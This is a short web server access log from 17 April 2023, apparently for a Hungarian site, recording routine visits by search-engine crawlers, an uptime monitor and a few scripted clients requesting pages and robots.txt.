114.119.154.89 - - [17/Apr/2023:08:07:17 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
212.237.51.151 - - [17/Apr/2023:08:24:19 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
185.191.171.10 - - [17/Apr/2023:08:32:57 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [17/Apr/2023:08:32:58 +0200] "GET /halozatok/kerekasztal/memo3/index.html HTTP/1.1" 200 8909 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
52.167.144.115 - - [17/Apr/2023:08:38:37 +0200] "GET /konferenciak/regionalis/index.html HTTP/1.1" 200 13298 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.76 - - [17/Apr/2023:08:39:00 +0200] "GET /galateia.css HTTP/1.1" 200 1717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
34.78.171.236 - - [17/Apr/2023:08:59:01 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
185.191.171.5 - - [17/Apr/2023:08:59:06 +0200] "GET /new/en/news/founding-deeds-and-operation-foundations HTTP/1.1" 200 8139 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.237.51.151 - - [17/Apr/2023:09:02:49 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
135.181.100.197 - - [17/Apr/2023:09:07:50 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "python-requests/2.28.2"
66.249.72.24 - - [17/Apr/2023:09:10:02 +0200] "GET /new/publikaciok/dossziek HTTP/1.1" 200 8294 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.109.229.142 - - [17/Apr/2023:09:17:48 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "python-requests/2.28.2"
185.191.171.34 - - [17/Apr/2023:09:22:14 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
